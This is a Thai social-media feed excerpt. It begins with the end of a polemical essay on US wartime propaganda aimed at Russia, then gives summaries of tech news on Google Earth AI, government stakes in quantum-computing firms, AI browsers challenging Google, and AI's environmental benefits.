(รายละเอียดมีอยู่ในนิทานเรื่อง “จิกโก๋ปากซอย” ถ้าอยากอ่านประวัติศาสตร์ นอกหลักสูตร กระทรวงศึกษาฯ) เรื่องที่ 2 ที่คณะละคร บอกสำคัญอย่างยิ่ง คือ เราต้องย้อมความคิค ย้อมสมองคนรัสเซียให้ “อยากทำสงคราม” ไม่ให้เชื่อฟังเยอรมัน อเมริกาจะทำได้อย่างไร รัสเซียไม่ใช่สมันน้อยนะ คณะละครบอกไม่มีปัญหา คนรัสเซีย ก็เหมือนเด็ก ที่ตัวโตนั่นแหละ เอ้า เจ้าหน้าที่รัสเซียที่ตามอ่านนิทาน ช่วยขีดเส้นใต้ 2 เส้น แล้วรายงานส่งคุณพี่ปูตินของผมด้วยนะครับ ว่าอเมริกาพูดแบบนี้ แปลว่าเห็นคนรัสเซียเป็นยังไง (เสี้ยม ซะหน่อย) คณะละครเร่ เขียนแผนการฟอกย้อมให้เสร็จ เขาระบุว่า เป้าหมายของแผนคือ: “To influence the attitude of the people of Russia for the prosecution of war as the only way of perpetuating their democracy ” ใครแปลเก่งๆ ลองแปลดูครับ สำหรับผม ผมเข้าใจความว่า เพื่อเป็นการย้อมความคิดของคนรัสเซีย ให้เชื่อว่า การเข้าทำสงคราม เป็นทางเดียวที่จะทำให้ประชาธิปไตยของเขาอยู่อย่างยั่งยืน ผมเขียนปูพื้น เล่ามาเสียยืดยาว เพื่อจะให้อ่านประโยคนี้กัน อ่านแล้วโปรดพิเคราะห์กันให้ดีๆ จะได้เห็น “สันดาน” อันอำมหิต ของอเมริกา (และของอังกฤษ) ที่ผ่านมาแล้วเกือบ 100 ปี แล้วก็ยังไม่เปลี่ยน และอีกกี่ร้อยปี ก็คงไม่มีวันเปลี่ยนความอำมหิต นี้ โดยใช้ความตอแหล แบบหน้าด้านๆ อ้างเรื่องประชาธิปไตย แบบตะหวักตะบวย เพื่อประโยชน์ของมัน หรือพวกมันเท่านั้น ใครจะเจ็บ ใครจะตาย ใครจะฉิบหาย ใครจะวิบัติ ขนาดไหน มันไม่สนใจ เลวถึงขนาดนี้ อำมหิต อย่างนี้ ยังมีคนอยากให้อเมริกา ครอบหัวสี่เหลี่ยมต่อไปอีกหรือครับ แผนการฟอกย้อม จะใช้วิธีหลักๆ อยู่ 5 อย่าง 1. จัดกระบวนการ “สร้าง และย้อมข่าว” แล้วกระจายข่าว ที่สร้างและย้อมแล้ว ไปทั่วรัสเซีย โดยจะเอาทีมงานมาจากอเมริกา ทั้งด้านการเขียน และการแปล คือเอาช่างชำนาญการย้อมของอเมริกา มาตั้งโรงงานที่รัสเซีย เหมือนที่มีอยู่เกลื่อนในบ้านสมันน้อย ซื้อมันทุกช่อง ครอบมันทุกฉบับ 2. การใช้เอกสารประเภทแผ่นพับ และใบปลิว เพื่อง่ายแก่การเสพข่าว สมัยนี้ก็คงเปลี่ยนเป็น เครื่องมือ ไอ้ป๊อด ไอ้แป้ด ไอ้โฟน โดยเฉพาะ พวกเล่นไลน์นี่เหยื่อชั้นดี ส่งข่าวย้อมอะไรเข้าไปแพลบเดียว กระจายทั่ว เรื่องโกหกทั้งนั้น เสพกันได้แยะและเร็วกว่า 3. สร้างหนังประเภทต่างๆ เพื่อให้ชาวรัสเซียเสพ เช่น หนังเกี่ยวกับสงคราม หนังชีวิตคนอเมริกันในชนบท ในเมือง หนังเกี่ยวกับการทำอุตสาหกรรม การค้า หนังตลก และที่สำคัญ หนังที่แสดงถึงความรักชาติและการแสวงหาประชาธิปไตย ฮอลลีวู้ดรับไป เดี๋ยวนี้ก็ยังเป็นโรงย้อมที่สำคัญหมายเลขหนึ่ง 4. การโฆษณา ประชาสัมพันธ์ โดยเฉพาะทำเป็นแผ่นโปสเตอร์สีสวยสดุดตา สื่อหัวข้อที่เหมาะสมกับรัสเซีย โดยให้สำนักงานประชาสัมพันธ์ ฝีมือเยี่ยมของอเมริกา รู้ไหมครับ พวกประชาสัมพันธ์เก่งๆ เขาย้อมโลกใบนี้มานานเท่าไหร่แล้ว เขาเอาอะไรมาใส่หัวสมันน้อยบ้าง 5. วิธีการที่แนบเนียนและใช้แพร่หลาย คือการพูด ซึ่งจำเป็นต้องใช้ นักพูด นักประชาสัมพันธ์ และครู เป็นจำนวนมาก โดยอเมริกาอาจจะเลือกอย่างเหมาะสม จากชาวรัสเซียก็ได้ นักพูดและครูนี้ ถือว่าเป็นเครื่องมือย้อมที่เยี่ยมที่สุด วิธีการนี้ บ้านสมันน้อยใช้แยะมาก ยิ่งตอนนี้ซึ่งเป็นช่วงสำคัญของบ้านเมือง ช่างย้อมถูกจ้างมาทำหน้าที่เพิ่มขึ้นอีกมาก มาในสาระพัดคราบ หัดสังเกตกันบ้าง ใครของจริง ใครของปลอม ใครช่างย้อมฝีมือเนียน เป็นไงครับ 5 วิธีการหลัก ยังอยู่ครบในศตวรรษนี้ แค่เปลี่ยน เสื้อผ้า หน้าผม ถ้อยคำ ท่าทาง ให้เข้ากับสมัย ละครฉากเดิมๆก็ยังใช้ได้ เครื่องมือย้อมก็ยังใช้อยู่ แค่เปลี่ยนรุ่นใหม่ไปเรื่อยๆ เท่านั้น นี่ตกลงเราจะให้เขาเล่นแบบนี้ ไปเรื่อยๆ อีก 100 ปีหรือไงครับ สวัสดีครับ คนเล่านิทาน 26 กพ. 2558 #################### เอกสารประกอบ FRUS https://www.dropbox.com/s/
    0 Comments 0 Shares 106 Views 0 Reviews
  • Google Earth AI อัปเกรดใหม่ – ใช้พลัง Gemini วิเคราะห์ภัยพิบัติและปัญหาสภาพอากาศล่วงหน้า

    Google Earth AI ได้รับการอัปเกรดครั้งใหญ่ โดยนำเทคโนโลยี Gemini AI เข้ามาเสริมความสามารถในการวิเคราะห์ข้อมูลภูมิสารสนเทศ เพื่อช่วยให้องค์กร เมือง และหน่วยงานไม่แสวงหากำไรสามารถรับมือกับภัยพิบัติและปัญหาสภาพอากาศได้รวดเร็วและแม่นยำยิ่งขึ้น

    ฟีเจอร์ใหม่ช่วยให้ผู้ใช้สามารถตั้งคำถามกับระบบ AI เพื่อดึงข้อมูลจากแหล่งต่างๆ เช่น พยากรณ์อากาศ แผนที่ประชากร และภาพถ่ายดาวเทียม เพื่อคาดการณ์จุดเสี่ยง เช่น พื้นที่น้ำท่วมจากพายุ หรือจุดที่อาจเกิดฝุ่นพิษจากแม่น้ำที่แห้งเหือด นอกจากนี้ยังสามารถตรวจจับการเกิดสาหร่ายพิษในแหล่งน้ำเพื่อแจ้งเตือนล่วงหน้าได้

    Earth AI ยังรองรับการเชื่อมโยงโมเดลหลายตัวเข้าด้วยกันเพื่อวิเคราะห์คำถามที่ซับซ้อน และเปิดให้หน่วยงานที่สนใจสมัครเป็น “Trusted Testers” ผ่าน Google Cloud เพื่อเข้าถึงโมเดลภาพถ่าย ประชากร และสิ่งแวดล้อม พร้อมเครื่องมือที่เกี่ยวข้อง

    การอัปเกรดนี้เกิดขึ้นหลังจาก Earth AI เคยช่วยแจ้งเตือนประชาชนกว่า 15 ล้านคนในเหตุไฟป่าแคลิฟอร์เนียปี 2025 โดยใช้ข้อมูลจากหน่วยงานท้องถิ่นเพื่อช่วยหาที่หลบภัย ถือเป็นตัวอย่างของการใช้ AI เพื่อช่วยชีวิตและเพิ่มความปลอดภัยในระดับมหภาค

    การอัปเกรด Google Earth AI
    ใช้ Gemini AI เพื่อวิเคราะห์ข้อมูลภูมิสารสนเทศ
    รองรับการตั้งคำถามและเชื่อมโยงโมเดลหลายตัว
    วิเคราะห์ข้อมูลจากพยากรณ์อากาศ แผนที่ประชากร และภาพดาวเทียม
    คาดการณ์ภัยพิบัติ เช่น น้ำท่วม ฝุ่นพิษ สาหร่ายพิษ

    การใช้งานในภาคส่วนต่างๆ
    หน่วยงานสามารถสมัครเป็น Trusted Testers ผ่าน Google Cloud
    ใช้โมเดลภาพถ่าย ประชากร และสิ่งแวดล้อมร่วมกับข้อมูลของตนเอง
    เหมาะสำหรับองค์กรที่ทำงานด้านสิ่งแวดล้อมและภัยพิบัติ

    ตัวอย่างการใช้งานจริง
    Earth AI เคยแจ้งเตือนประชาชน 15 ล้านคนในเหตุไฟป่าแคลิฟอร์เนีย
    ใช้ข้อมูลจากหน่วยงานท้องถิ่นเพื่อช่วยหาที่หลบภัย
    แสดงให้เห็นถึงศักยภาพของ AI ในการช่วยชีวิต

    ข้อควรระวังและความท้าทาย
    การวิเคราะห์ข้อมูลต้องอาศัยความแม่นยำของโมเดลและข้อมูลต้นทาง
    การใช้งานต้องมีความเข้าใจด้านภูมิสารสนเทศและการตั้งคำถามที่เหมาะสม
    หากข้อมูลไม่ครบถ้วน อาจเกิดการคาดการณ์ผิดพลาด
    การเข้าถึงฟีเจอร์บางอย่างอาจจำกัดเฉพาะผู้สมัคร Trusted Testers

    https://www.techradar.com/pro/google-earth-ai-wants-to-help-us-spot-weather-disasters-and-climate-issues-before-they-happen
    🌍 Google Earth AI อัปเกรดใหม่ – ใช้พลัง Gemini วิเคราะห์ภัยพิบัติและปัญหาสภาพอากาศล่วงหน้า Google Earth AI ได้รับการอัปเกรดครั้งใหญ่ โดยนำเทคโนโลยี Gemini AI เข้ามาเสริมความสามารถในการวิเคราะห์ข้อมูลภูมิสารสนเทศ เพื่อช่วยให้องค์กร เมือง และหน่วยงานไม่แสวงหากำไรสามารถรับมือกับภัยพิบัติและปัญหาสภาพอากาศได้รวดเร็วและแม่นยำยิ่งขึ้น ฟีเจอร์ใหม่ช่วยให้ผู้ใช้สามารถตั้งคำถามกับระบบ AI เพื่อดึงข้อมูลจากแหล่งต่างๆ เช่น พยากรณ์อากาศ แผนที่ประชากร และภาพถ่ายดาวเทียม เพื่อคาดการณ์จุดเสี่ยง เช่น พื้นที่น้ำท่วมจากพายุ หรือจุดที่อาจเกิดฝุ่นพิษจากแม่น้ำที่แห้งเหือด นอกจากนี้ยังสามารถตรวจจับการเกิดสาหร่ายพิษในแหล่งน้ำเพื่อแจ้งเตือนล่วงหน้าได้ Earth AI ยังรองรับการเชื่อมโยงโมเดลหลายตัวเข้าด้วยกันเพื่อวิเคราะห์คำถามที่ซับซ้อน และเปิดให้หน่วยงานที่สนใจสมัครเป็น “Trusted Testers” ผ่าน Google Cloud เพื่อเข้าถึงโมเดลภาพถ่าย ประชากร และสิ่งแวดล้อม พร้อมเครื่องมือที่เกี่ยวข้อง การอัปเกรดนี้เกิดขึ้นหลังจาก Earth AI เคยช่วยแจ้งเตือนประชาชนกว่า 15 ล้านคนในเหตุไฟป่าแคลิฟอร์เนียปี 2025 โดยใช้ข้อมูลจากหน่วยงานท้องถิ่นเพื่อช่วยหาที่หลบภัย ถือเป็นตัวอย่างของการใช้ AI เพื่อช่วยชีวิตและเพิ่มความปลอดภัยในระดับมหภาค ✅ การอัปเกรด Google Earth AI ➡️ ใช้ Gemini AI เพื่อวิเคราะห์ข้อมูลภูมิสารสนเทศ ➡️ รองรับการตั้งคำถามและเชื่อมโยงโมเดลหลายตัว ➡️ วิเคราะห์ข้อมูลจากพยากรณ์อากาศ แผนที่ประชากร และภาพดาวเทียม ➡️ คาดการณ์ภัยพิบัติ เช่น น้ำท่วม ฝุ่นพิษ สาหร่ายพิษ ✅ การใช้งานในภาคส่วนต่างๆ ➡️ หน่วยงานสามารถสมัครเป็น Trusted Testers ผ่าน Google Cloud ➡️ ใช้โมเดลภาพถ่าย ประชากร และสิ่งแวดล้อมร่วมกับข้อมูลของตนเอง ➡️ เหมาะสำหรับองค์กรที่ทำงานด้านสิ่งแวดล้อมและภัยพิบัติ ✅ ตัวอย่างการใช้งานจริง ➡️ Earth AI เคยแจ้งเตือนประชาชน 15 ล้านคนในเหตุไฟป่าแคลิฟอร์เนีย ➡️ ใช้ข้อมูลจากหน่วยงานท้องถิ่นเพื่อช่วยหาที่หลบภัย ➡️ แสดงให้เห็นถึงศักยภาพของ AI ในการช่วยชีวิต ‼️ ข้อควรระวังและความท้าทาย ⛔ การวิเคราะห์ข้อมูลต้องอาศัยความแม่นยำของโมเดลและข้อมูลต้นทาง ⛔ การใช้งานต้องมีความเข้าใจด้านภูมิสารสนเทศและการตั้งคำถามที่เหมาะสม ⛔ หากข้อมูลไม่ครบถ้วน อาจเกิดการคาดการณ์ผิดพลาด ⛔ การเข้าถึงฟีเจอร์บางอย่างอาจจำกัดเฉพาะผู้สมัคร Trusted Testers https://www.techradar.com/pro/google-earth-ai-wants-to-help-us-spot-weather-disasters-and-climate-issues-before-they-happen
    0 Comments 0 Shares 78 Views 0 Reviews
  • รัฐบาลทรัมป์เตรียมลงทุนในบริษัทควอนตัมคอมพิวติ้ง – แลกเงินสนับสนุนกับหุ้นบริษัทเอกชน

    รัฐบาลสหรัฐฯ ภายใต้การนำของประธานาธิบดีทรัมป์กำลังเจรจากับบริษัทควอนตัมคอมพิวติ้งชั้นนำเพื่อแลกเปลี่ยนเงินสนับสนุนจาก CHIPS Act กับหุ้นในบริษัทเหล่านั้น โดยมีเป้าหมายเพื่อส่งเสริมเทคโนโลยีควอนตัมที่อาจเปลี่ยนแปลงอุตสาหกรรมในอนาคต และเพิ่มบทบาทของรัฐบาลในฐานะนักลงทุนโดยตรงในภาคเอกชน

    บริษัทที่อยู่ระหว่างการเจรจา ได้แก่ Atom Computing, D-Wave Quantum, IonQ, Rigetti Computing และ Quantum Computing โดยแต่ละแห่งต้องการเงินสนับสนุนอย่างน้อย 10 ล้านดอลลาร์จากกระทรวงพาณิชย์สหรัฐฯ ซึ่งจะได้รับหุ้นหรือเครื่องมือทางการเงินอื่นๆ ตอบแทน การลงทุนนี้จะมาจากสำนักงาน Chips Research and Development ซึ่งดูแลงบประมาณจาก CHIPS Act

    การเคลื่อนไหวครั้งนี้เกิดขึ้นหลังจากรัฐบาลได้เปลี่ยนเงินสนับสนุนมูลค่า 9 พันล้านดอลลาร์ให้กลายเป็นหุ้น 9.9% ใน Intel และ 15% ใน MP Materials ซึ่งเป็นผู้ผลิตแร่หายากในสหรัฐฯ ถือเป็นการเปลี่ยนแนวทางจากการให้เงินเปล่าเป็นการลงทุนที่มีผลตอบแทน

    ควอนตัมคอมพิวติ้งมีศักยภาพในการคำนวณที่เหนือกว่าซูเปอร์คอมพิวเตอร์ทั่วไป โดยเฉพาะในด้านการค้นคว้ายาและวัสดุใหม่ๆ ซึ่งทำให้เทคโนโลยีนี้กลายเป็นสนามแข่งขันระดับโลก รัฐบาลสหรัฐฯ จึงต้องการเร่งผลักดันให้บริษัทในประเทศเติบโตและแข่งขันได้

    แผนการลงทุนของรัฐบาลสหรัฐฯ
    เจรจากับบริษัทควอนตัมคอมพิวติ้งเพื่อแลกเงินสนับสนุนกับหุ้น
    บริษัทที่เข้าร่วม ได้แก่ Atom Computing, D-Wave Quantum, IonQ, Rigetti Computing และ Quantum Computing
    เงินสนับสนุนมาจาก CHIPS Act ผ่านสำนักงาน Chips R&D
    เปลี่ยนบทบาทรัฐบาลจากผู้ให้เงินสนับสนุนเป็นนักลงทุนโดยตรง

    ตัวอย่างการลงทุนที่ผ่านมา
    รัฐบาลถือหุ้น 9.9% ใน Intel จากเงินสนับสนุน 9 พันล้านดอลลาร์
    Pentagon ถือหุ้น 15% ใน MP Materials ผู้ผลิตแร่หายาก

    ความสำคัญของควอนตัมคอมพิวติ้ง
    มีศักยภาพในการคำนวณที่เหนือกว่าซูเปอร์คอมพิวเตอร์
    ส่งผลต่อการค้นคว้ายา วัสดุ และอุตสาหกรรมอื่นๆ
    เป็นสนามแข่งขันระดับโลกด้านเทคโนโลยี

    ข้อควรระวังและความท้าทาย
    การลงทุนในเทคโนโลยีที่ยังไม่พิสูจน์อาจมีความเสี่ยงสูง
    หากบริษัทไม่ประสบความสำเร็จ รัฐบาลอาจสูญเสียเงินลงทุน
    การแทรกแซงของรัฐบาลในภาคเอกชนอาจกระทบต่อกลไกตลาด
    การแข่งขันกับประเทศอื่นในด้านควอนตัมอาจนำไปสู่ความตึงเครียดทางเทคโนโลยี

    https://www.tomshardware.com/tech-industry/quantum-computing/trump-administration-to-follow-up-intel-stake-with-investment-in-quantum-computing-report-claims-tens-of-millions-of-chips-act-dollars-could-be-paid-out-to-leading-companies-in-exchange-for-equity
    🇺🇸 รัฐบาลทรัมป์เตรียมลงทุนในบริษัทควอนตัมคอมพิวติ้ง – แลกเงินสนับสนุนกับหุ้นบริษัทเอกชน รัฐบาลสหรัฐฯ ภายใต้การนำของประธานาธิบดีทรัมป์กำลังเจรจากับบริษัทควอนตัมคอมพิวติ้งชั้นนำเพื่อแลกเปลี่ยนเงินสนับสนุนจาก CHIPS Act กับหุ้นในบริษัทเหล่านั้น โดยมีเป้าหมายเพื่อส่งเสริมเทคโนโลยีควอนตัมที่อาจเปลี่ยนแปลงอุตสาหกรรมในอนาคต และเพิ่มบทบาทของรัฐบาลในฐานะนักลงทุนโดยตรงในภาคเอกชน บริษัทที่อยู่ระหว่างการเจรจา ได้แก่ Atom Computing, D-Wave Quantum, IonQ, Rigetti Computing และ Quantum Computing โดยแต่ละแห่งต้องการเงินสนับสนุนอย่างน้อย 10 ล้านดอลลาร์จากกระทรวงพาณิชย์สหรัฐฯ ซึ่งจะได้รับหุ้นหรือเครื่องมือทางการเงินอื่นๆ ตอบแทน การลงทุนนี้จะมาจากสำนักงาน Chips Research and Development ซึ่งดูแลงบประมาณจาก CHIPS Act การเคลื่อนไหวครั้งนี้เกิดขึ้นหลังจากรัฐบาลได้เปลี่ยนเงินสนับสนุนมูลค่า 9 พันล้านดอลลาร์ให้กลายเป็นหุ้น 9.9% ใน Intel และ 15% ใน MP Materials ซึ่งเป็นผู้ผลิตแร่หายากในสหรัฐฯ ถือเป็นการเปลี่ยนแนวทางจากการให้เงินเปล่าเป็นการลงทุนที่มีผลตอบแทน ควอนตัมคอมพิวติ้งมีศักยภาพในการคำนวณที่เหนือกว่าซูเปอร์คอมพิวเตอร์ทั่วไป โดยเฉพาะในด้านการค้นคว้ายาและวัสดุใหม่ๆ ซึ่งทำให้เทคโนโลยีนี้กลายเป็นสนามแข่งขันระดับโลก รัฐบาลสหรัฐฯ จึงต้องการเร่งผลักดันให้บริษัทในประเทศเติบโตและแข่งขันได้ ✅ แผนการลงทุนของรัฐบาลสหรัฐฯ ➡️ เจรจากับบริษัทควอนตัมคอมพิวติ้งเพื่อแลกเงินสนับสนุนกับหุ้น ➡️ บริษัทที่เข้าร่วม ได้แก่ Atom Computing, D-Wave Quantum, IonQ, Rigetti Computing และ Quantum Computing ➡️ เงินสนับสนุนมาจาก CHIPS Act ผ่านสำนักงาน Chips R&D ➡️ เปลี่ยนบทบาทรัฐบาลจากผู้ให้เงินสนับสนุนเป็นนักลงทุนโดยตรง ✅ ตัวอย่างการลงทุนที่ผ่านมา ➡️ รัฐบาลถือหุ้น 9.9% ใน Intel จากเงินสนับสนุน 9 พันล้านดอลลาร์ ➡️ Pentagon ถือหุ้น 15% ใน MP Materials ผู้ผลิตแร่หายาก ✅ ความสำคัญของควอนตัมคอมพิวติ้ง ➡️ มีศักยภาพในการคำนวณที่เหนือกว่าซูเปอร์คอมพิวเตอร์ ➡️ ส่งผลต่อการค้นคว้ายา วัสดุ และอุตสาหกรรมอื่นๆ ➡️ เป็นสนามแข่งขันระดับโลกด้านเทคโนโลยี ‼️ ข้อควรระวังและความท้าทาย ⛔ การลงทุนในเทคโนโลยีที่ยังไม่พิสูจน์อาจมีความเสี่ยงสูง ⛔ หากบริษัทไม่ประสบความสำเร็จ รัฐบาลอาจสูญเสียเงินลงทุน ⛔ การแทรกแซงของรัฐบาลในภาคเอกชนอาจกระทบต่อกลไกตลาด ⛔ การแข่งขันกับประเทศอื่นในด้านควอนตัมอาจนำไปสู่ความตึงเครียดทางเทคโนโลยี https://www.tomshardware.com/tech-industry/quantum-computing/trump-administration-to-follow-up-intel-stake-with-investment-in-quantum-computing-report-claims-tens-of-millions-of-chips-act-dollars-could-be-paid-out-to-leading-companies-in-exchange-for-equity
    0 Comments 0 Shares 66 Views 0 Reviews
  • สงครามค้นหายุคใหม่: AI กำลังเปลี่ยนโฉมการท่องเว็บ และท้าทายอำนาจของ Google

    ในยุคที่ปัญญาประดิษฐ์กลายเป็นผู้ช่วยประจำตัวของผู้คนทั่วโลก การค้นหาข้อมูลบนอินเทอร์เน็ตก็ไม่เหมือนเดิมอีกต่อไป บทความจาก The Star เผยว่า “การค้นหาออนไลน์” กำลังกลายเป็นสมรภูมิใหม่ของบริษัทยักษ์ใหญ่ด้าน AI ที่พยายามเปลี่ยนวิธีที่ผู้คนเข้าถึงข้อมูล และท้าทายอำนาจของ Google Chrome ที่ครองตลาดมากกว่า 70%

    บริษัทอย่าง OpenAI, Microsoft, Perplexity และ Dia ต่างเปิดตัว “เบราว์เซอร์ AI” ที่สามารถค้นหาข้อมูล วิเคราะห์ และดำเนินการแทนผู้ใช้ได้โดยไม่ต้องพิมพ์คำค้นหาแบบเดิมอีกต่อไป เช่น Atlas ของ OpenAI สามารถสร้างรายการซื้อของตามเมนูและจำนวนแขกได้ทันทีจากคำสั่งเดียว

    แม้ Google จะมีฟีเจอร์ AI Overviews และโหมด AI Search ที่ใช้ reasoning และ multimodal แต่ก็ยังไม่ถึงขั้น “agentic AI” ที่สามารถทำงานแทนผู้ใช้ได้อย่างเต็มรูปแบบ

    สรุปประเด็นสำคัญจากบทความ

    1️⃣ การเปลี่ยนแปลงของการค้นหาออนไลน์
    แนวโน้มใหม่
    เบราว์เซอร์ AI สามารถค้นหาและดำเนินการแทนผู้ใช้ได้
    ไม่ใช่แค่ตอบคำถาม แต่สามารถจัดการงาน เช่น จองร้านอาหารหรือวางแผนการเดินทาง
    เปลี่ยนจาก “search engine” เป็น “action engine”

    คำเตือน
    ผู้ใช้อาจพึ่งพา AI มากเกินไปโดยไม่ตรวจสอบข้อมูล
    ความผิดพลาดจาก AI อาจนำไปสู่การตัดสินใจที่ไม่ถูกต้อง

    2️⃣ ผู้เล่นหลักในสมรภูมิ AI Search
    เบราว์เซอร์ AI ที่เปิดตัวแล้ว
    Atlas จาก OpenAI
    Comet จาก Perplexity
    Copilot-enabled Edge จาก Microsoft
    Dia และ Neon จากผู้พัฒนารายใหม่

    คำเตือน
    บางเบราว์เซอร์ยังอยู่ในช่วงทดลอง อาจมีข้อจำกัดด้านความปลอดภัย
    การรวบรวมข้อมูลผู้ใช้เพื่อปรับปรุง AI อาจกระทบความเป็นส่วนตัว

    3️⃣ จุดแข็งและจุดอ่อนของ Google
    จุดแข็งของ Google
    Chrome ครองตลาดเบราว์เซอร์มากกว่า 70%
    Google Search ยังเป็นเครื่องมือหลักในการค้นหาข้อมูล
    มีฟีเจอร์ AI Overviews และโหมด AI Search

    จุดอ่อนที่ถูกท้าทาย
    ยังไม่เข้าสู่ระดับ “agentic AI” ที่ทำงานแทนผู้ใช้ได้
    คู่แข่งสามารถรวบรวมข้อมูลจากการใช้งาน AI เพื่อพัฒนาโมเดลได้เร็วกว่า

    4️⃣ ความเห็นจากผู้เชี่ยวชาญ
    มุมมองจากนักวิเคราะห์
    Avi Greengart: “AI acting in the browser makes sense เพราะแอปส่วนใหญ่ทำงานผ่านเบราว์เซอร์อยู่แล้ว”
    Evan Schlossman: “AI กำลังควบคุมอินเทอร์เฟซของผู้ใช้ เพื่อ streamline ประสบการณ์”
    Thomas Thiele: “การรวมข้อมูลจาก ChatGPT และ Atlas อาจสร้าง Google ใหม่”

    คำเตือน
    การควบคุมอินเทอร์เฟซโดย AI อาจทำให้ผู้ใช้เสียอำนาจในการเลือก
    การรวบรวมข้อมูลมากเกินไปอาจนำไปสู่การละเมิดสิทธิส่วนบุคคล

    https://www.thestar.com.my/tech/tech-news/2025/10/24/online-search-a-battleground-for-ai-titans
    🔍 สงครามค้นหายุคใหม่: AI กำลังเปลี่ยนโฉมการท่องเว็บ และท้าทายอำนาจของ Google ในยุคที่ปัญญาประดิษฐ์กลายเป็นผู้ช่วยประจำตัวของผู้คนทั่วโลก การค้นหาข้อมูลบนอินเทอร์เน็ตก็ไม่เหมือนเดิมอีกต่อไป บทความจาก The Star เผยว่า “การค้นหาออนไลน์” กำลังกลายเป็นสมรภูมิใหม่ของบริษัทยักษ์ใหญ่ด้าน AI ที่พยายามเปลี่ยนวิธีที่ผู้คนเข้าถึงข้อมูล และท้าทายอำนาจของ Google Chrome ที่ครองตลาดมากกว่า 70% บริษัทอย่าง OpenAI, Microsoft, Perplexity และ Dia ต่างเปิดตัว “เบราว์เซอร์ AI” ที่สามารถค้นหาข้อมูล วิเคราะห์ และดำเนินการแทนผู้ใช้ได้โดยไม่ต้องพิมพ์คำค้นหาแบบเดิมอีกต่อไป เช่น Atlas ของ OpenAI สามารถสร้างรายการซื้อของตามเมนูและจำนวนแขกได้ทันทีจากคำสั่งเดียว แม้ Google จะมีฟีเจอร์ AI Overviews และโหมด AI Search ที่ใช้ reasoning และ multimodal แต่ก็ยังไม่ถึงขั้น “agentic AI” ที่สามารถทำงานแทนผู้ใช้ได้อย่างเต็มรูปแบบ 🔍 สรุปประเด็นสำคัญจากบทความ 1️⃣ การเปลี่ยนแปลงของการค้นหาออนไลน์ ✅ แนวโน้มใหม่ ➡️ เบราว์เซอร์ AI สามารถค้นหาและดำเนินการแทนผู้ใช้ได้ ➡️ ไม่ใช่แค่ตอบคำถาม แต่สามารถจัดการงาน เช่น จองร้านอาหารหรือวางแผนการเดินทาง ➡️ เปลี่ยนจาก “search engine” เป็น “action engine” ‼️ คำเตือน ⛔ ผู้ใช้อาจพึ่งพา AI มากเกินไปโดยไม่ตรวจสอบข้อมูล ⛔ ความผิดพลาดจาก AI อาจนำไปสู่การตัดสินใจที่ไม่ถูกต้อง 2️⃣ ผู้เล่นหลักในสมรภูมิ AI Search ✅ เบราว์เซอร์ AI ที่เปิดตัวแล้ว ➡️ Atlas จาก OpenAI ➡️ Comet จาก Perplexity ➡️ Copilot-enabled Edge จาก Microsoft ➡️ Dia และ Neon จากผู้พัฒนารายใหม่ ‼️ คำเตือน ⛔ บางเบราว์เซอร์ยังอยู่ในช่วงทดลอง อาจมีข้อจำกัดด้านความปลอดภัย ⛔ การรวบรวมข้อมูลผู้ใช้เพื่อปรับปรุง AI อาจกระทบความเป็นส่วนตัว 3️⃣ จุดแข็งและจุดอ่อนของ Google ✅ จุดแข็งของ Google ➡️ Chrome ครองตลาดเบราว์เซอร์มากกว่า 70% ➡️ Google Search ยังเป็นเครื่องมือหลักในการค้นหาข้อมูล ➡️ มีฟีเจอร์ AI Overviews และโหมด AI Search ‼️ จุดอ่อนที่ถูกท้าทาย ⛔ ยังไม่เข้าสู่ระดับ “agentic AI” ที่ทำงานแทนผู้ใช้ได้ ⛔ คู่แข่งสามารถรวบรวมข้อมูลจากการใช้งาน AI เพื่อพัฒนาโมเดลได้เร็วกว่า 4️⃣ ความเห็นจากผู้เชี่ยวชาญ ✅ มุมมองจากนักวิเคราะห์ ➡️ Avi Greengart: “AI acting in the browser makes sense เพราะแอปส่วนใหญ่ทำงานผ่านเบราว์เซอร์อยู่แล้ว” ➡️ Evan Schlossman: “AI กำลังควบคุมอินเทอร์เฟซของผู้ใช้ เพื่อ streamline ประสบการณ์” ➡️ Thomas Thiele: “การรวมข้อมูลจาก ChatGPT และ Atlas อาจสร้าง Google ใหม่” ‼️ คำเตือน ⛔ การควบคุมอินเทอร์เฟซโดย AI อาจทำให้ผู้ใช้เสียอำนาจในการเลือก ⛔ การรวบรวมข้อมูลมากเกินไปอาจนำไปสู่การละเมิดสิทธิส่วนบุคคล https://www.thestar.com.my/tech/tech-news/2025/10/24/online-search-a-battleground-for-ai-titans
    WWW.THESTAR.COM.MY
    Online search a battleground for AI titans
    Tech firms battling for supremacy in artificial intelligence are out to transform how people search the web, challenging the dominance of the Chrome browser at the heart of Google's empire.
    0 Comments 0 Shares 73 Views 0 Reviews
  • AI กับสิ่งแวดล้อม: ใช้พลังงานมหาศาล แต่ก็ช่วยโลกได้ใน 5 วิธี

    แม้ปัญญาประดิษฐ์ (AI) จะถูกวิจารณ์ว่าใช้พลังงานและน้ำมหาศาล โดยเฉพาะในศูนย์ข้อมูลที่รองรับการประมวลผลขั้นสูง แต่บทความจาก The Star ชี้ให้เห็นว่า AI ก็สามารถเป็นเครื่องมือสำคัญในการช่วยลดมลพิษและเพิ่มประสิทธิภาพการใช้พลังงานในหลายภาคส่วนได้เช่นกัน

    นักวิจัยและผู้เชี่ยวชาญเสนอ 5 วิธีที่ AI สามารถช่วยสิ่งแวดล้อมได้ ตั้งแต่การจัดการพลังงานในอาคาร ไปจนถึงการลดการปล่อยก๊าซเรือนกระจกจากการผลิตน้ำมันและการจราจร

    สรุป 5 วิธีที่ AI ช่วยสิ่งแวดล้อม

    1️⃣ เพิ่มประสิทธิภาพการใช้พลังงานในอาคาร
    วิธีการทำงาน
    AI ปรับแสงสว่าง อุณหภูมิ และการระบายอากาศตามสภาพอากาศและการใช้งานจริง
    คาดว่าช่วยลดการใช้พลังงานในอาคารได้ 10–30%
    ระบบอัตโนมัติช่วยลดการเปิดแอร์หรือฮีตเตอร์เกินความจำเป็น

    คำเตือน
    หากระบบ AI ขัดข้อง อาจทำให้การควบคุมอุณหภูมิผิดพลาด
    ต้องมีการบำรุงรักษาเซ็นเซอร์และระบบควบคุมอย่างสม่ำเสมอ

    2️⃣ จัดการการชาร์จอุปกรณ์ไฟฟ้าอย่างมีประสิทธิภาพ
    วิธีการทำงาน
    AI กำหนดเวลาชาร์จ EV และสมาร์ตโฟนให้เหมาะกับช่วงที่ไฟฟ้าถูกและสะอาด
    ลดการใช้ไฟฟ้าช่วงพีค และลดการพึ่งพาพลังงานจากฟอสซิล

    คำเตือน
